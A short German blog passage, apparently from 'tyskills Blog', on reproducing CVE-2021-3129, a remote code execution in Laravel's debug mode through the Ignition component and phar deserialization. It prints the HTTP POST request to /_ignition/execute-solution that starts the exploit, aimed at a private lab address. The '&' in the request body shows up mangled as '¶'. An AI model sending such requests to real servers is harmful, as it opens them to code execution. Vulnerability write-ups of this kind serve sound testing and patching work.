
Laravel RCE CVE-2021-3129
Laravel RCE CVE-2021-3129
Wenn der Debug-Modus von Laravel aktiviert ist, können Angreifer durch die unsichere Verwendung der Funktionen file_get_contents() und file_put_contents() durch die in Laravel integrierte Ignition-Komponente durch das Senden böswilliger Anfragen und das Erstellen böswilliger Logdateien eine Phar-Deserialisierung auslösen, was letztendlich zu einer Remote-Code-Ausführung führt.
Laravel <= 8.4.2
POST /_ignition/execute-solution HTTP/1.1
Host: 192.168.24.153:8888
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
solution=Facade\Ignition\Solutions\MakeViewVariableOptionalSolution¶meters[variableName]=cve20213129¶meters[viewFile]=null

[CVE-2021-3129]Laravel Debug-Modus RCE-Reproduktion | tyskills Blog